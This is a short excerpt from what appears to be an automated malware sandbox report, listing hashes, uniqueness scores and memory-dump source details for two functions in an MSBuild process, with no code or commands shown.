                                              • Opcode ID: a02516a5faab48e6a1c6741813596f7e68a7b5d9e43e019510cb265cdb4c4bd8
                                              • Instruction ID: 7939b5817d8a67ccfe7f02d07aee145ec68fa63359f49773a2753fa5b179377d
                                              • Opcode Fuzzy Hash: a02516a5faab48e6a1c6741813596f7e68a7b5d9e43e019510cb265cdb4c4bd8
                                              • Instruction Fuzzy Hash: B5210471604344DFDB14EF14D9C4B16BBA5FB88714F24C5ADE90A4B286C37AD847CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00C4D005 Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3346295930.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_c4d000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bf526e77f84be1a295a0361ddce0a73bf795fe2257dcc6ffb7c62f88686d2385
                                              • Instruction ID: 447d916b928eb711440c9e477b20a9a6970e9d34d644fece9cab63183ab6be88
                                              • Opcode Fuzzy Hash: bf526e77f84be1a295a0361ddce0a73bf795fe2257dcc6ffb7c62f88686d2385
                                              • Instruction Fuzzy Hash: FF218E755093C08FCB02DF24D994715BF71FB46314F28C5EAD8498B2A7C33A980ACB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%